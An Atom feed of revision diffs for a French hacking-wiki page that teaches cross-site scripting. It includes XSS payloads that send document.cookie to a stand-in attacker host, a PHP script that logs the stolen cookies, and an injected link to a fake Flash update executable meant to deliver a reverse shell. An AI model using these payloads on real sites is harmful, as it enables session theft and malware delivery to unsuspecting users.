<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
	<id>https://wiki.hackbbs.org/index.php?action=history&amp;feed=atom&amp;title=Web%3ACross-Site_Scripting_-_XSS</id>
	<title>Web:Cross-Site Scripting - XSS - Historique des versions</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.hackbbs.org/index.php?action=history&amp;feed=atom&amp;title=Web%3ACross-Site_Scripting_-_XSS"/>
	<link rel="alternate" type="text/html" href="https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;action=history"/>
	<updated>2026-05-11T15:18:59Z</updated>
	<subtitle>Historique des versions pour cette page sur le wiki</subtitle>
	<generator>MediaWiki 1.42.0-alpha</generator>
	<entry>
		<id>https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93698&amp;oldid=prev</id>
		<title>Neib le 9 janvier 2024 à 01:20</title>
		<link rel="alternate" type="text/html" href="https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93698&amp;oldid=prev"/>
		<updated>2024-01-09T01:20:56Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;fr&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Version précédente&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version du 9 janvier 2024 à 03:20&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l53&quot;&gt;Ligne 53 :&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Ligne 53 :&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;[[Category:Hacking]][[Category:Web]]&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Neib</name></author>
	</entry>
	<entry>
		<id>https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93662&amp;oldid=prev</id>
		<title>Neib : Neib a déplacé la page Cross-Site Scripting - XSS vers Web:Cross-Site Scripting - XSS sans laisser de redirection</title>
		<link rel="alternate" type="text/html" href="https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93662&amp;oldid=prev"/>
		<updated>2024-01-06T13:45:29Z</updated>

		<summary type="html">&lt;p&gt;Neib a déplacé la page &lt;a href=&quot;/index.php?title=Cross-Site_Scripting_-_XSS&amp;amp;action=edit&amp;amp;redlink=1&quot; class=&quot;new&quot; title=&quot;Cross-Site Scripting - XSS (page inexistante)&quot;&gt;Cross-Site Scripting - XSS&lt;/a&gt; vers &lt;a href=&quot;/index.php/Web:Cross-Site_Scripting_-_XSS&quot; title=&quot;Web:Cross-Site Scripting - XSS&quot;&gt;Web:Cross-Site Scripting - XSS&lt;/a&gt; sans laisser de redirection&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;fr&quot;&gt;
				&lt;td colspan=&quot;1&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Version précédente&lt;/td&gt;
				&lt;td colspan=&quot;1&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version du 6 janvier 2024 à 15:45&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-notice&quot; lang=&quot;fr&quot;&gt;&lt;div class=&quot;mw-diff-empty&quot;&gt;(Aucune différence)&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</summary>
		<author><name>Neib</name></author>
	</entry>
	<entry>
		<id>https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93549&amp;oldid=prev</id>
		<title>OldNeib : Neib a déplacé la page Cross-Site Scipting - XSS vers Cross-Site Scripting - XSS</title>
		<link rel="alternate" type="text/html" href="https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93549&amp;oldid=prev"/>
		<updated>2023-12-02T15:36:06Z</updated>

		<summary type="html">&lt;p&gt;Neib a déplacé la page &lt;a href=&quot;/index.php?title=Cross-Site_Scipting_-_XSS&amp;amp;action=edit&amp;amp;redlink=1&quot; class=&quot;new&quot; title=&quot;Cross-Site Scipting - XSS (page inexistante)&quot;&gt;Cross-Site Scipting - XSS&lt;/a&gt; vers &lt;a href=&quot;/index.php?title=Cross-Site_Scripting_-_XSS&amp;amp;action=edit&amp;amp;redlink=1&quot; class=&quot;new&quot; title=&quot;Cross-Site Scripting - XSS (page inexistante)&quot;&gt;Cross-Site Scripting - XSS&lt;/a&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;fr&quot;&gt;
				&lt;td colspan=&quot;1&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Version précédente&lt;/td&gt;
				&lt;td colspan=&quot;1&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version du 2 décembre 2023 à 17:36&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-notice&quot; lang=&quot;fr&quot;&gt;&lt;div class=&quot;mw-diff-empty&quot;&gt;(Aucune différence)&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</summary>
		<author><name>OldNeib</name></author>
	</entry>
	<entry>
		<id>https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93538&amp;oldid=prev</id>
		<title>OldNeib : /* Cheat Sheet */</title>
		<link rel="alternate" type="text/html" href="https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93538&amp;oldid=prev"/>
		<updated>2023-12-02T14:10:54Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Cheat Sheet&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;fr&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Version précédente&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version du 2 décembre 2023 à 16:10&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l51&quot;&gt;Ligne 51 :&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Ligne 51 :&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;= Cheat Sheet =&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;= Cheat Sheet =&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-side-deleted&quot;&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;*https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection&lt;/ins&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>OldNeib</name></author>
	</entry>
	<entry>
		<id>https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93537&amp;oldid=prev</id>
		<title>OldNeib : /* Exemple de récupération de cookies */</title>
		<link rel="alternate" type="text/html" href="https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93537&amp;oldid=prev"/>
		<updated>2023-12-02T14:09:13Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Exemple de récupération de cookies&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;background-color: #fff; color: #202122;&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;fr&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Version précédente&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version du 2 décembre 2023 à 16:09&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l33&quot;&gt;Ligne 33 :&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Ligne 33 :&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*La victime doit maintenant accéder à notre page:&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*La victime doit maintenant accéder à notre page:&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;−&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  &quot; /&amp;gt;&amp;lt;script&amp;gt;document.location=&quot;http://attaquant.com/&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;get&lt;/del&gt;.php?v=&quot; + document.cookie;&amp;lt;/script&amp;gt;&amp;lt;p class=&quot;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot; data-marker=&quot;+&quot;&gt;&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;  &quot; /&amp;gt;&amp;lt;script&amp;gt;document.location=&quot;http://attaquant.com/&lt;ins style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;getCookie&lt;/ins&gt;.php?v=&quot; + document.cookie;&amp;lt;/script&amp;gt;&amp;lt;p class=&quot;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;td class=&quot;diff-marker&quot;&gt;&lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>OldNeib</name></author>
	</entry>
	<entry>
		<id>https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93536&amp;oldid=prev</id>
		<title>OldNeib : Page créée avec « = Présentation = Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur.  Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: &lt;b&gt;lapin.jpg&lt;/b&gt; et comme description: &lt;b&gt;Oh! Trop mignon!&lt;/b&gt;.... »</title>
		<link rel="alternate" type="text/html" href="https://wiki.hackbbs.org/index.php?title=Web:Cross-Site_Scripting_-_XSS&amp;diff=93536&amp;oldid=prev"/>
		<updated>2023-12-02T14:08:42Z</updated>

		<summary type="html">&lt;p&gt;Page créée avec « = Présentation = Cette vulnérabilité est possible lorsqu&amp;#039;une valeur qui peut être contrôlée par l&amp;#039;utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur.  Imaginons un site où il serait possible d&amp;#039;uploader une image. Nous envoyons donc une image avec comme nom: &amp;lt;b&amp;gt;lapin.jpg&amp;lt;/b&amp;gt; et comme description: &amp;lt;b&amp;gt;Oh! Trop mignon!&amp;lt;/b&amp;gt;.... »&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Nouvelle page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;= Présentation =&lt;br /&gt;
Cette vulnérabilité est possible lorsqu'une valeur qui peut être contrôlée par l'utilisateur est injectée dans une page web sans suffisamment de contrôles, et que cette valeur peut être du code HTML ou JavaScript valide, qui sera alors interprété par le navigateur.&lt;br /&gt;
&lt;br /&gt;
Imaginons un site où il serait possible d'uploader une image. Nous envoyons donc une image avec comme nom: &amp;lt;b&amp;gt;lapin.jpg&amp;lt;/b&amp;gt; et comme description: &amp;lt;b&amp;gt;Oh! Trop mignon!&amp;lt;/b&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
La page retournée nous renverrait alors l'image sous la forme:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;img src=&amp;quot;./lapin.jpg&amp;quot; title=&amp;quot;Oh! Trop mignon!&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un cas classique d'exploitation serait de remplacer la description: &amp;lt;b&amp;gt;Oh! Trop mignon!&amp;lt;/b&amp;gt; par: &amp;lt;b&amp;gt;&amp;quot; /&amp;gt;&amp;lt;script&amp;gt;alert('Hacked!');&amp;lt;/script&amp;gt;&amp;lt;p class=&amp;quot;&amp;lt;/b&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site nous retournerait alors:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;img src=&amp;quot;./lapin.jpg&amp;quot; title=&amp;quot;&amp;quot; /&amp;gt;&amp;lt;script&amp;gt;alert('Hacked!');&amp;lt;/script&amp;gt;&amp;lt;p class=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ce code HTML étant valide, notre JavaScript sera exécuté au sein du navigateur.&lt;br /&gt;
&lt;br /&gt;
En se débrouillant pour faire afficher cette image à un autre utilisateur, le code s'exécutera cette fois ci dans son navigateur. Il est ainsi possible de récupérer certaines informations sensibles ou alors de faire exécuter quelque action depuis le navigateur de notre cible.&lt;br /&gt;
&lt;br /&gt;
Ici, comme le code injecté est enregistré par le serveur via notre image, quiconque se rendra sur la page où notre image est enregistré se verra exécuter notre script.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Éxploitation =&lt;br /&gt;
== Exemple de récupération de cookies ==&lt;br /&gt;
*Préparation du fichier &amp;lt;b&amp;gt;getCookie.php&amp;lt;/b&amp;gt;. Celui-ci devra être enregistré de façon `pouvoir être consulté depuis le navigateur de notre cible.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
     $cookie = $_GET['v'] . &amp;quot;\n&amp;quot;;&lt;br /&gt;
     file_put_contents(&amp;quot;cookies.txt&amp;quot;, $cookie, FILE_APPEND | LOCK_EX);&lt;br /&gt;
 ?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*La victime doit maintenant accéder à notre page:&lt;br /&gt;
&lt;br /&gt;
 &amp;quot; /&amp;gt;&amp;lt;script&amp;gt;document.location=&amp;quot;http://attaquant.com/get.php?v=&amp;quot; + document.cookie;&amp;lt;/script&amp;gt;&amp;lt;p class=&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La page contenant l'image deviendra alors:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;img src=&amp;quot;./lapin.jpg&amp;quot; title=&amp;quot;&amp;quot; /&amp;gt;&amp;lt;script&amp;gt;document.location=&amp;quot;http://control.domain/get.php?v=&amp;quot; + document.cookie;&amp;lt;/script&amp;gt;&amp;lt;p class=&amp;quot;&amp;quot; /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois arrivé sur la page piégée, l'utilisateur sera redirigé vers notre page avec ses cookies en paramètre. Cookies qui seront enregistrés dans un fichier nommé &amp;lt;b&amp;gt;cookie.txt&amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Social Engineering ==&lt;br /&gt;
Un exemple d'attaque à adapter selon son imagination:&lt;br /&gt;
*Création d'un exécutable type [[Reverse Shell]] ou autre.&lt;br /&gt;
*Simulation d'un plugin manquant pour lire ou exécuter un contenu sur le navigateur de notre victime. Ex: &amp;quot;Pour continuer, Flash Player doit être mis à jour.&amp;quot; + image utilisée lorsqu'un plugin est réellement manquant.&lt;br /&gt;
*Téléchargement de notre faux plugin par la victime, puis exécution.&lt;br /&gt;
&lt;br /&gt;
 &amp;quot; /&amp;gt; &amp;lt;a href=&amp;quot;http://control.domain/flash_update.exe&amp;quot;&amp;gt;&amp;lt;img src=&amp;quot;http://control.domain/flash.png&amp;quot; /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;p alt=&amp;quot;&lt;br /&gt;
&lt;br /&gt;
= Cheat Sheet =&lt;br /&gt;
*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&lt;/div&gt;</summary>
		<author><name>OldNeib</name></author>
	</entry>
</feed>